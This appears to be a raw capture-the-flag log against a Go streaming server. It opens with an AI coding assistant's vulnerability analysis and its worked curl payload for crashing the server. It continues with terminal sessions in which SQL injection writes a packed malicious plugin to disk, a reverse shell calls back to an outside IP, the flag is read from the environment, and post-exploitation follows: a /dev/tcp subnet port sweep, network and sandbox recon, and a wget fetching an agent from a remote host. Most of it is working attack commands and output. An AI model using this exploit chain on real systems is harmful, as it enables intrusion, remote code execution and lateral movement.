  close the quote and inject expressions (e.g., boolean expressions or function calls) without comments
  or semicolons. With extension loading enabled by the chosen driver, load_extension() on an uploaded .so
  yields code execution inside the process.

  Mitigations

  - Remove or gate plugin loading:
      - Do not autoload from a writable directory.
      - Load only signed/whitelisted plugins from a read-only path.
      - Make plugin loading opt-in and not at process start; require a restart with strict deployment
  controls.
  - Fix the SQL injection:
      - Use parameterized queries: SELECT title,date FROM meta WHERE date LIKE ? with date+"%".
      - Disable extension loading entirely at the driver/connection level; remove go-sqlite3-ext if not
  strictly needed.
      - Delete utils.CheckUserInput; rely on proper parameterization.
  - Lock down filesystem:
      - Ensure plugins/ and templates/ are read-only to the app user.
      - Separate writable upload paths from any executable/search paths.
  - Contain blast radius:
      - Run as a non-root user with minimal privileges.
      - Use a read-only root filesystem and mount plugins/ as read-only.
      - Add seccomp/AppArmor and egress filtering to limit what loaded code can do.
  - Avoid restart-on-panic for untrusted requests:
      - Remove the “panic string contains ‘index out of range’ → os.Exit(1)” behavior or guard it behind
  an admin-only maintenance path.

  If you want, I can:

  - Patch the SQL to use parameters and remove the brittle input check.
  - Add a feature flag to disable plugin loading by default and validate the plugin directory is
  read-only.

▌how can the middleware panic be triggered via an HTTP request?

• Explored
  └ Read buffer.go
    List pool
    Search func|index|slice|\[|\] in pool
    Read pool.go, docker-compose.yml

> You can crash it via the metadata endpoint by forcing an “index out of range” in the meta handler.

  Vulnerable Route

  - GET /admin/metadata?mode=updinfo&mount=/Example&song=<very-long-string>
  - Requires a valid Authorization: Basic <base64(user:pass)> header.

  Why It Panics

  - In mosh/mount.go::meta the code computes metaSize as a single byte:
      - metaSize = byte(ceil(len(mStr)/16))
      - mStr is "StreamTitle='<song>';", so len(mStr) = len(song) + 15.
  - If ceil(len(mStr)/16) == 256, the byte overflows to 0, so meta is allocated with length 1.
  - The code then writes len(mStr) bytes into meta[1:], causing a slice write past end → panic “index out
  of range”.

  How To Trigger

  - Make len(mStr) fall in 4081..4096, i.e., set len(song) to 4066..4081 bytes (ASCII to avoid encoding
  surprises).
  - Example (replace host/creds/mount as needed):
      - MOUNT=/Example
      - AUTH=$(printf 'admin:password' | base64)  # use real creds
      - SONG=$(head -c 4066 /dev/zero | tr '\0' 'A')
      - curl:
      - `curl -G "http://127.0.0.1:9080/admin/metadata" --data-urlencode "mode=updinfo" --data-urlencode
  "mount=$MOUNT" --data-urlencode "song=$SONG" -H "Authorization: Basic $AUTH"`

  Effect

  - The panic message contains “index out of range”, so the middleware calls os.Exit(1).
  - With the provided compose config (restart: always and a runner loop), the process restarts
  immediately.

~/shared/chunks > ls other                                                                                                                                                                                                         lo at kali
htmx.so.part000.hex  htmx.so.part011.hex  htmx.so.part022.hex  htmx.so.part033.hex  htmx.so.part044.hex  htmx.so.part055.hex  htmx.so.part066.hex  htmx.so.part077.hex  htmx.so.part088.hex  htmx.so.part099.hex  htmx.so.part110.hex
htmx.so.part001.hex  htmx.so.part012.hex  htmx.so.part023.hex  htmx.so.part034.hex  htmx.so.part045.hex  htmx.so.part056.hex  htmx.so.part067.hex  htmx.so.part078.hex  htmx.so.part089.hex  htmx.so.part100.hex  htmx.so.part111.hex
htmx.so.part002.hex  htmx.so.part013.hex  htmx.so.part024.hex  htmx.so.part035.hex  htmx.so.part046.hex  htmx.so.part057.hex  htmx.so.part068.hex  htmx.so.part079.hex  htmx.so.part090.hex  htmx.so.part101.hex  htmx.so.part112.hex
htmx.so.part003.hex  htmx.so.part014.hex  htmx.so.part025.hex  htmx.so.part036.hex  htmx.so.part047.hex  htmx.so.part058.hex  htmx.so.part069.hex  htmx.so.part080.hex  htmx.so.part091.hex  htmx.so.part102.hex
htmx.so.part004.hex  htmx.so.part015.hex  htmx.so.part026.hex  htmx.so.part037.hex  htmx.so.part048.hex  htmx.so.part059.hex  htmx.so.part070.hex  htmx.so.part081.hex  htmx.so.part092.hex  htmx.so.part103.hex
htmx.so.part005.hex  htmx.so.part016.hex  htmx.so.part027.hex  htmx.so.part038.hex  htmx.so.part049.hex  htmx.so.part060.hex  htmx.so.part071.hex  htmx.so.part082.hex  htmx.so.part093.hex  htmx.so.part104.hex
htmx.so.part006.hex  htmx.so.part017.hex  htmx.so.part028.hex  htmx.so.part039.hex  htmx.so.part050.hex  htmx.so.part061.hex  htmx.so.part072.hex  htmx.so.part083.hex  htmx.so.part094.hex  htmx.so.part105.hex
htmx.so.part007.hex  htmx.so.part018.hex  htmx.so.part029.hex  htmx.so.part040.hex  htmx.so.part051.hex  htmx.so.part062.hex  htmx.so.part073.hex  htmx.so.part084.hex  htmx.so.part095.hex  htmx.so.part106.hex
htmx.so.part008.hex  htmx.so.part019.hex  htmx.so.part030.hex  htmx.so.part041.hex  htmx.so.part052.hex  htmx.so.part063.hex  htmx.so.part074.hex  htmx.so.part085.hex  htmx.so.part096.hex  htmx.so.part107.hex
htmx.so.part009.hex  htmx.so.part020.hex  htmx.so.part031.hex  htmx.so.part042.hex  htmx.so.part053.hex  htmx.so.part064.hex  htmx.so.part075.hex  htmx.so.part086.hex  htmx.so.part097.hex  htmx.so.part108.hex
htmx.so.part010.hex  htmx.so.part021.hex  htmx.so.part032.hex  htmx.so.part043.hex  htmx.so.part054.hex  htmx.so.part065.hex  htmx.so.part076.hex  htmx.so.part087.hex  htmx.so.part098.hex  htmx.so.part109.hex
~/shared/chunks > vim test.sh                                                                                                                                                                                                      lo at kali
~/shared/chunks > ./test.sh other                                                                                                                                                                                                  lo at kali
other/htmx.so.part000.hex: {
  "Songs": [
	{
	  "Title": "60000",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}other/htmx.so.part001.hex: {
  "Songs": [
	{
	  "Title": "60000",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}other/htmx.so.part002.hex: {
  "Songs": [
	{
	  "Title": "60000",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}other/htmx.so.part003.hex: {
  "Songs": [
	{
	  "Title": "60000",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}other/htmx.so.part004.hex: {
  "Songs": [
	{
	  "Title": "60000",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}other/htmx.so.part005.hex: {
  "Songs": [
	{
	  "Title": "60000",
	  "Date": "1970-01-01T00:00:59Z"
	}
	
[...]

}other/htmx.so.part110.hex: {
  "Songs": [
	{
	  "Title": "60000",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}other/htmx.so.part111.hex: {
  "Songs": [
	{
	  "Title": "60000",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}other/htmx.so.part112.hex: {
  "Songs": [
	{
	  "Title": "16096",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}

~/shared/asdf/qwer ! > curl -sS -G 'http://46.101.222.148:8080/meta.json' \                                                                                                                                                        lo at kali
  --data-urlencode "date=' union all select writefile('/app/plugins/htmx.so',readfile('/tmp/other/htmx.so.part000.hex.bin')||readfile('/tmp/other/htmx.so.part001.hex.bin')||readfile('/tmp/other/htmx.so.part002.hex.bin')||readfile('/tmp/other/htmx.so.part003.hex.bin')||readfile('/tmp/other/htmx.so.part004.hex.bin')||readfile('/tmp/other/htmx.so.part005.hex.bin')||readfile('/tmp/other/htmx.so.part006.hex.bin')||readfile('/tmp/other/htmx.so.part007.hex.bin')||readfile('/tmp/other/htmx.so.part008.hex.bin')||readfile('/tmp/other/htmx.so.part009.hex.bin')||readfile('/tmp/other/htmx.so.part010.hex.bin')||readfile('/tmp/other/htmx.so.part011.hex.bin')||readfile('/tmp/other/htmx.so.part012.hex.bin')||readfile('/tmp/other/htmx.so.part013.hex.bin')||readfile('/tmp/other/htmx.so.part014.hex.bin')||readfile('/tmp/other/htmx.so.part015.hex.bin')||readfile('/tmp/other/htmx.so.part016.hex.bin')||readfile('/tmp/other/htmx.so.part017.hex.bin')||readfile('/tmp/other/htmx.so.part018.hex.bin')||readfile('/tmp/other/htmx.so.part019.hex.bin')||readfile('/tmp/other/htmx.so.part020.hex.bin')||readfile('/tmp/other/htmx.so.part021.hex.bin')||readfile('/tmp/other/htmx.so.part022.hex.bin')||readfile('/tmp/other/htmx.so.part023.hex.bin')||readfile('/tmp/other/htmx.so.part024.hex.bin')||readfile('/tmp/other/htmx.so.part025.hex.bin')||readfile('/tmp/other/htmx.so.part026.hex.bin')||readfile('/tmp/other/htmx.so.part027.hex.bin')||readfile('/tmp/other/htmx.so.part028.hex.bin')||readfile('/tmp/other/htmx.so.part029.hex.bin')||readfile('/tmp/other/htmx.so.part030.hex.bin')||readfile('/tmp/other/htmx.so.part031.hex.bin')||readfile('/tmp/other/htmx.so.part032.hex.bin')||readfile('/tmp/other/htmx.so.part033.hex.bin')||readfile('/tmp/other/htmx.so.part034.hex.bin')||readfile('/tmp/other/htmx.so.part035.hex.bin')||readfile('/tmp/other/htmx.so.part036.hex.bin')||readfile('/tmp/other/htmx.so.part037.hex.bin')||readfile('/tmp/other/htmx.so.part038.hex.bin')||readfile('/tmp/other/htmx.so.part039.hex.bin')||readfile('/tmp/other/htmx.so.part040.hex.bin')||readfile('/tmp/other/htmx.so.part041.hex.bin')||readfile('/tmp/other/htmx.so.part042.hex.bin')||readfile('/tmp/other/htmx.so.part043.hex.bin')||readfile('/tmp/other/htmx.so.part044.hex.bin')||readfile('/tmp/other/htmx.so.part045.hex.bin')||readfile('/tmp/other/htmx.so.part046.hex.bin')||readfile('/tmp/other/htmx.so.part047.hex.bin')||readfile('/tmp/other/htmx.so.part048.hex.bin')||readfile('/tmp/other/htmx.so.part049.hex.bin')||readfile('/tmp/other/htmx.so.part050.hex.bin')||readfile('/tmp/other/htmx.so.part051.hex.bin')||readfile('/tmp/other/htmx.so.part052.hex.bin')||readfile('/tmp/other/htmx.so.part053.hex.bin')||readfile('/tmp/other/htmx.so.part054.hex.bin')||readfile('/tmp/other/htmx.so.part055.hex.bin')||readfile('/tmp/other/htmx.so.part056.hex.bin')||readfile('/tmp/other/htmx.so.part057.hex.bin')||readfile('/tmp/other/htmx.so.part058.hex.bin')||readfile('/tmp/other/htmx.so.part059.hex.bin')||readfile('/tmp/other/htmx.so.part060.hex.bin')||readfile('/tmp/other/htmx.so.part061.hex.bin')||readfile('/tmp/other/htmx.so.part062.hex.bin')||readfile('/tmp/other/htmx.so.part063.hex.bin')||readfile('/tmp/other/htmx.so.part064.hex.bin')||readfile('/tmp/other/htmx.so.part065.hex.bin')||readfile('/tmp/other/htmx.so.part066.hex.bin')||readfile('/tmp/other/htmx.so.part067.hex.bin')||readfile('/tmp/other/htmx.so.part068.hex.bin')||readfile('/tmp/other/htmx.so.part069.hex.bin')||readfile('/tmp/other/htmx.so.part070.hex.bin')||readfile('/tmp/other/htmx.so.part071.hex.bin')||readfile('/tmp/other/htmx.so.part072.hex.bin')||readfile('/tmp/other/htmx.so.part073.hex.bin')||readfile('/tmp/other/htmx.so.part074.hex.bin')||readfile('/tmp/other/htmx.so.part075.hex.bin')||readfile('/tmp/other/htmx.so.part076.hex.bin')||readfile('/tmp/other/htmx.so.part077.hex.bin')||readfile('/tmp/other/htmx.so.part078.hex.bin')||readfile('/tmp/other/htmx.so.part079.hex.bin')||readfile('/tmp/other/htmx.so.part080.hex.bin')||readfile('/tmp/other/htmx.so.part081.hex.bin')||readfile('/tmp/other/htmx.so.part082.hex.bin')||readfile('/tmp/other/htmx.so.part083.hex.bin')||readfile('/tmp/other/htmx.so.part084.hex.bin')||readfile('/tmp/other/htmx.so.part085.hex.bin')||readfile('/tmp/other/htmx.so.part086.hex.bin')||readfile('/tmp/other/htmx.so.part087.hex.bin')||readfile('/tmp/other/htmx.so.part088.hex.bin')||readfile('/tmp/other/htmx.so.part089.hex.bin')||readfile('/tmp/other/htmx.so.part090.hex.bin')||readfile('/tmp/other/htmx.so.part091.hex.bin')||readfile('/tmp/other/htmx.so.part092.hex.bin')||readfile('/tmp/other/htmx.so.part093.hex.bin')||readfile('/tmp/other/htmx.so.part094.hex.bin')||readfile('/tmp/other/htmx.so.part095.hex.bin')||readfile('/tmp/other/htmx.so.part096.hex.bin')||readfile('/tmp/other/htmx.so.part097.hex.bin')||readfile('/tmp/other/htmx.so.part098.hex.bin')||readfile('/tmp/other/htmx.so.part099.hex.bin')||readfile('/tmp/other/htmx.so.part100.hex.bin')||readfile('/tmp/other/htmx.so.part101.hex.bin')||readfile('/tmp/other/htmx.so.part102.hex.bin')||readfile('/tmp/other/htmx.so.part103.hex.bin')||readfile('/tmp/other/htmx.so.part104.hex.bin')||readfile('/tmp/other/htmx.so.part105.hex.bin')||readfile('/tmp/other/htmx.so.part106.hex.bin')||readfile('/tmp/other/htmx.so.part107.hex.bin')||readfile('/tmp/other/htmx.so.part108.hex.bin')||readfile('/tmp/other/htmx.so.part109.hex.bin')||readfile('/tmp/other/htmx.so.part110.hex.bin')||readfile('/tmp/other/htmx.so.part111.hex.bin')||readfile('/tmp/other/htmx.so.part112.hex.bin')),59-- -"
{
  "Songs": [
	{
	  "Title": "6736096",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}

/app # go build -buildmode=plugin -a -gcflags=all="-l -B" -ldflags="-w -s" -o plugins/example.so plugins/example.go
/app # ls -al plugins/example.
example.go  example.so
/app # ls -al plugins/example.so
-rw-r--r--    1 root     root       8557408 Oct  1 00:24 plugins/example.so
/app # go build -buildmode=plugin -o plugins/nothing.so plugins/example.go
/app # ls -al plugins/
total 21152
drwxr-xr-x    1 root     root          4096 Oct  1 00:25 .
drwxr-xr-x    1 root     root          4096 Mar 20  2025 ..
-rw-r--r--    1 root     root           226 Oct  1 00:13 example.go
-rw-r--r--    1 root     root       8557408 Oct  1 00:24 example.so
-rw-r--r--    1 root     root      13077688 Oct  1 00:25 nothing.so



/app # upx --best --lzma plugins/example.so
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2024
UPX 4.2.4       Markus Oberhumer, Laszlo Molnar & John Reiser    May 9th 2024

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   8557408 ->   6228838   72.79%   linux/amd64   example.so

Packed 1 file.

/app # ls -al plugins/
total 18876
drwxr-xr-x    1 root     root          4096 Oct  1 00:27 .
drwxr-xr-x    1 root     root          4096 Mar 20  2025 ..
-rw-r--r--    1 root     root           226 Oct  1 00:13 example.go
-rwxr-xr-x    1 root     root       6228838 Oct  1 00:24 example.so
-rw-------    1 root     root             0 Oct  1 00:26 example.upx
-rw-r--r--    1 root     root      13077688 Oct  1 00:25 nothing.so



/app # go build -buildmode=plugin -a -ldflags="-w -s" -o plugins/example.so plugins/example.go
/app # upx plugins/example.so
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2024
UPX 4.2.4       Markus Oberhumer, Laszlo Molnar & John Reiser    May 9th 2024

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: plugins/example.so: CantPackException: file not executable; try 'chmod +x'

Packed 0 files.
/app # chmod +x plugins/example.so
/app # upx plugins/example.so
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2024
UPX 4.2.4       Markus Oberhumer, Laszlo Molnar & John Reiser    May 9th 2024

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   9260512 ->   6817254   73.62%   linux/amd64   example.so

Packed 1 file.
/app # go build -buildmode=plugin -a -ldflags="-w -s" -o plugins/example.so plugins/example.go ^C

/app # ./moshcast
2025/10/01 00:32:46 MoshCast 1.0.0
2025/10/01 00:32:46 Loading plugin: plugins/example.so
^C


/app # ls -la plugins/
total 3480
drwxr-xr-x    1 root     root          4096 Oct  1 01:17 .
drwxr-xr-x    1 root     root          4096 Mar 20  2025 ..
-rw-r--r--    1 root     root           514 Oct  1 01:15 example.go
-rwxr-xr-x    1 root     root       3539652 Oct  1 01:15 example.so



curl -sS -G 'http://46.101.222.148:8080/meta.json' --data-urlencode "date=' union all select writefile('//////app/plugins/\!-\!.so',readfile('/tmp/ok/suck-it.so.part00.hex.bin')||readfile('/tmp/ok/suck-it.so.part01.hex.bin')||readfile('/tmp/ok/suck-it.so.part02.hex.bin')||readfile('/tmp/ok/suck-it.so.part03.hex.bin')||readfile('/tmp/ok/suck-it.so.part04.hex.bin')||readfile('/tmp/ok/suck-it.so.part05.hex.bin')||readfile('/tmp/ok/suck-it.so.part06.hex.bin')||readfile('/tmp/ok/suck-it.so.part07.hex.bin')||readfile('/tmp/ok/suck-it.so.part08.hex.bin')||readfile('/tmp/ok/suck-it.so.part09.hex.bin')||readfile('/tmp/ok/suck-it.so.part10.hex.bin')||readfile('/tmp/ok/suck-it.so.part11.hex.bin')||readfile('/tmp/ok/suck-it.so.part12.hex.bin')||readfile('/tmp/ok/suck-it.so.part13.hex.bin')||readfile('/tmp/ok/suck-it.so.part14.hex.bin')||readfile('/tmp/ok/suck-it.so.part15.hex.bin')||readfile('/tmp/ok/suck-it.so.part16.hex.bin')||readfile('/tmp/ok/suck-it.so.part17.hex.bin')||readfile('/tmp/ok/suck-it.so.part18.hex.bin')||readfile('/tmp/ok/suck-it.so.part19.hex.bin')||readfile('/tmp/ok/suck-it.so.part20.hex.bin')||readfile('/tmp/ok/suck-it.so.part21.hex.bin')||readfile('/tmp/ok/suck-it.so.part22.hex.bin')||readfile('/tmp/ok/suck-it.so.part23.hex.bin')||readfile('/tmp/ok/suck-it.so.part24.hex.bin')||readfile('/tmp/ok/suck-it.so.part25.hex.bin')||readfile('/tmp/ok/suck-it.so.part26.hex.bin')||readfile('/tmp/ok/suck-it.so.part27.hex.bin')||readfile('/tmp/ok/suck-it.so.part28.hex.bin')||readfile('/tmp/ok/suck-it.so.part29.hex.bin')||readfile('/tmp/ok/suck-it.so.part30.hex.bin')||readfile('/tmp/ok/suck-it.so.part31.hex.bin')||readfile('/tmp/ok/suck-it.so.part32.hex.bin')||readfile('/tmp/ok/suck-it.so.part33.hex.bin')||readfile('/tmp/ok/suck-it.so.part34.hex.bin')||readfile('/tmp/ok/suck-it.so.part35.hex.bin')||readfile('/tmp/ok/suck-it.so.part36.hex.bin')||readfile('/tmp/ok/suck-it.so.part37.hex.bin')||readfile('/tmp/ok/suck-it.so.part38.hex.bin')||readfile('/tmp/ok/suck-it.so.part39.hex.bin')||readfile('/tmp/ok/suck-it.so.part40.hex.bin')||readfile('/tmp/ok/suck-it.so.part41.hex.bin')||readfile('/tmp/ok/suck-it.so.part42.hex.bin')||readfile('/tmp/ok/suck-it.so.part43.hex.bin')||readfile('/tmp/ok/suck-it.so.part44.hex.bin')||readfile('/tmp/ok/suck-it.so.part45.hex.bin')||readfile('/tmp/ok/suck-it.so.part46.hex.bin')||readfile('/tmp/ok/suck-it.so.part47.hex.bin')||readfile('/tmp/ok/suck-it.so.part48.hex.bin')||readfile('/tmp/ok/suck-it.so.part49.hex.bin')||readfile('/tmp/ok/suck-it.so.part50.hex.bin')||readfile('/tmp/ok/suck-it.so.part51.hex.bin')||readfile('/tmp/ok/suck-it.so.part52.hex.bin')||readfile('/tmp/ok/suck-it.so.part53.hex.bin')||readfile('/tmp/ok/suck-it.so.part54.hex.bin')||readfile('/tmp/ok/suck-it.so.part55.hex.bin')||readfile('/tmp/ok/suck-it.so.part56.hex.bin')||readfile('/tmp/ok/suck-it.so.part57.hex.bin')),59-- -"
{
  "Songs": [
	{
	  "Title": "3539652",
	  "Date": "1970-01-01T00:00:59Z"
	}
  ]
}                            


connect to [172.232.50.49] from (UNKNOWN) [46.101.222.148] 35944
ls
Dockerfile
Makefile
README.md
config.yaml
data
docker-compose.yml
go.mod
go.sum
html
log
main.go
mosh
moshcast
plugins
pool
templates
utils
vendor
hostname
moshcast


flag.txt
cat flag.txt
FLAG{RitualOfFireAGateway....Oh damn it... it looks like we've lost the rest. In this case, a shell might help!}
env
HOSTNAME=moshcast
SHLVL=2
HOME=/root
OLDPWD=/
GOTOOLCHAIN=local
PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
GOPATH=/go
PWD=/root
FLAG=FLAG{RitualOfFireAGatewayOfSin#4a387c69ee0c8d71904fe0530fc936d7}
GOLANG_VERSION=1.23.6

chall 4

ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP qlen 1000
    link/ether de:df:e2:2d:f2:a3 brd ff:ff:ff:ff:ff:ff
    inet 46.101.222.148/18 brd 46.101.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet 10.19.0.27/16 brd 10.19.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::dcdf:e2ff:fe2d:f2a3/64 scope link
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc fq_codel state DOWN qlen 1000
    link/ether 92:38:35:01:bf:7b brd ff:ff:ff:ff:ff:ff
5: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN
    link/ether 46:21:7c:4a:9a:a3 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
6: br-5d2e524c90f4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP
    link/ether 46:f0:12:be:1a:2b brd ff:ff:ff:ff:ff:ff
    inet 172.19.0.1/16 brd 172.19.255.255 scope global br-5d2e524c90f4
       valid_lft forever preferred_lft forever
    inet6 fe80::44f0:12ff:febe:1a2b/64 scope link
       valid_lft forever preferred_lft forever
7: br-df6910015503: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN
    link/ether 4e:01:7f:e6:fe:90 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-df6910015503
       valid_lft forever preferred_lft forever
8: vethf4c1b3b@eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-5d2e524c90f4 state UP
    link/ether 1e:91:5e:24:ea:36 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::1c91:5eff:fe24:ea36/64 scope link
       valid_lft forever preferred_lft forever
11: tailscale0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1280 qdisc fq_codel state UNKNOWN qlen 500
    link/[65534]
    inet 100.64.0.5/32 scope global tailscale0
       valid_lft forever preferred_lft forever
    inet6 fd7a:115c:a1e0::5/128 scope global
       valid_lft forever preferred_lft forever
    inet6 fe80::8f1a:3185:c99d:2c87/64 scope link flags 800
       valid_lft forever preferred_lft forever

ps aux
PID   USER     TIME  COMMAND
    1 root      0:00 ash -c while true; do /app/moshcast; done
  513 root      0:00 /app/moshcast
  519 root      0:00 sh
  521 root      0:00 wget -O /app/plugins/.nxven/agent-a8 91.99.167.172:8000/agent-a8
  524 root      0:00 /bin/sh
  535 root      0:00 ps aux
	ls
	
	
netstat -punta
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN      -
tcp        0      0 100.64.0.5:41053        0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.54:53           0.0.0.0:*               LISTEN      -
tcp        0      0 46.101.222.148:44984    91.99.167.172:443       ESTABLISHED 765/moshcast
tcp        0      0 46.101.222.148:47036    104.248.129.28:443      ESTABLISHED -
tcp        0      0 46.101.222.148:53420    91.99.167.172:80        ESTABLISHED 779/agent-a8
tcp        0     54 46.101.222.148:57872    172.232.50.49:80        ESTABLISHED 765/moshcast
tcp        0      0 46.101.222.148:49242    185.40.234.219:443      ESTABLISHED -
tcp        0      0 :::22                   :::*                    LISTEN      -
tcp        0      0 :::8000                 :::*                    LISTEN      -
tcp        0      0 :::8080                 :::*                    LISTEN      765/moshcast
tcp        0      0 fd7a:115c:a1e0::5:44445 :::*                    LISTEN      -
tcp        0      0 ::ffff:46.101.222.148:8080 ::ffff:142.93.169.194:41404 TIME_WAIT   -
udp        0      0 127.0.0.54:53           0.0.0.0:*                           -
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -
udp        0      0 0.0.0.0:41641           0.0.0.0:*                           -
udp        0      0 :::41641                :::*                                -


cat /etc/hosts
# Your system has configured 'manage_etc_hosts' as True.
# As a result, if you wish for changes to this file to persist
# then you will need to either
# a.) make changes to the master file in /etc/cloud/templates/hosts.debian.tmpl
# b.) change or remove the value of 'manage_etc_hosts' in
#     /etc/cloud/cloud.cfg or cloud-config from user-data
#
127.0.1.1 moshcast moshcast
127.0.0.1 localhost

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters


for i in {1..255}; do (echo > /dev/tcp/100.64.0.$i/80) >/dev/null 2>&1 && echo $i is open; done

GOCACHE=/tmp/.asdf/cache go run tcpdump.go
tcpdump.go:9:2: no required module provides package github.com/miekg/pcap: go.mod file not found in current directory or any parent directory; see 'go help modules'
GOCACHE=/tmp/.asdf/cache go mod init test
go: creating new go.mod: module test
go: to add module requirements and sums:
        go mod tidy
GOCACHE=/tmp/.asdf/cache go run tcpdump.go
tcpdump.go:9:2: no required module provides package github.com/miekg/pcap; to add it:
        go get github.com/miekg/pcap
GOCACHE=/tmp/.asdf/cache go mod tidy
go: finding module for package github.com/miekg/pcap
go: writing stat cache: mkdir /go/pkg/mod/cache/download/github.com/miekg: read-only file system
go: downloading github.com/miekg/pcap v1.0.1
go: test imports
        github.com/miekg/pcap: mkdir /go/pkg/mod/cache/download/github.com/miekg: read-only file system
mkdir bin
GOCACHE=/tmp/.asdf/cache GOBIN=/tmp/.asdf/bin go mod tidy
go: finding module for package github.com/miekg/pcap
go: writing stat cache: mkdir /go/pkg/mod/cache/download/github.com/miekg: read-only file system
go: downloading github.com/miekg/pcap v1.0.1
go: test imports
        github.com/miekg/pcap: mkdir /go/pkg/mod/cache/download/github.com/miekg: read-only file system
ls /go
bin
pkg
src
env
HOSTNAME=moshcast
SHLVL=2
HOME=/root
OLDPWD=/tmp
GOTOOLCHAIN=local
PATH=/go/bin:/usr/local/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
GOPATH=/go
PWD=/tmp/.asdf
FLAG=FLAG{RitualOfFireAGatewayOfSin#4a387c69ee0c8d71904fe0530fc936d7}
GOLANG_VERSION=1.23.6
GOCACHE=/tmp/.asdf/cache GOBIN=/tmp/.asdf/bin GOPATH=/tmp/.asdf/go
mkdir go
GOCACHE=/tmp/.asdf/cache GOBIN=/tmp/.asdf/bin GOPATH=/tmp/.asdf/go go mod tidy


export GOCACHE=/app/plugins/.asdf/cache GOBIN=/app/plugins/.asdf/bin GOPATH=/app/plugins/.asdf/go GOTMPDIR=/app/plugins/.asdf/.gotmp



grep -i seccomp /proc/self/status
Seccomp:        2
Seccomp_filters:        1
cat /proc/self/attr/current 2>/dev/null   # AppArmor profile if any
docker-default (enforce)
id -Z 2>/dev/null
mount | column -t
/bin/sh: column: not found
findmnt -A 2>/dev/null || cat /proc/mounts
overlay / overlay ro,relatime,lowerdir=/var/lib/docker/overlay2/l/ZZOIAEWQXMY6RHRHOCDZWDYCAV:/var/lib/docker/overlay2/l/CXUY2ZQAEOPPLFSFJVILTZVL3F:/var/lib/docker/overlay2/l/CW4K2ZSTJ7YLMYNOFML3NIWCHF:/var/lib/docker/overlay2/l/2YGOGL5CXCUYMDSHSQ6IBVWOCT:/var/lib/docker/overlay2/l/YFDONCNLGKIODJC4D5ICXGDWY7:/var/lib/docker/overlay2/l/GVOMCN65KY5MZSP2FICAKUCDYI:/var/lib/docker/overlay2/l/2UV3KBYZM2BA3NE7AS4DEFUNZI:/var/lib/docker/overlay2/l/UI2VYITGS3SJM27IIUYJRFB3GO:/var/lib/docker/overlay2/l/I7TUF4GWJY33ADQQZGQKWY76QB:/var/lib/docker/overlay2/l/MTXCTWDAYIYOWOCS7LWITWMN2J:/var/lib/docker/overlay2/l/OKDBTOURVH2ZK2A5Q36XK6UD5S:/var/lib/docker/overlay2/l/ISOYRFLOC6HK2HNV67DUDSGAYD,upperdir=/var/lib/docker/overlay2/a70a967066d7f1413b9b432a8bdf4808900ebbd0fe7ead2c80c04452806b6840/diff,workdir=/var/lib/docker/overlay2/a70a967066d7f1413b9b432a8bdf4808900ebbd0fe7ead2c80c04452806b6840/work,nouserxattr 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev tmpfs rw,nosuid,size=65536k,mode=755,inode64 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
cgroup /sys/fs/cgroup cgroup2 ro,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot 0 0
mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k,inode64 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime,inode64 0 0
/dev/vda1 /app/README.md ext4 ro,relatime,discard,errors=remount-ro,commit=30 0 0
/dev/vda1 /app/plugins ext4 rw,relatime,discard,errors=remount-ro,commit=30 0 0
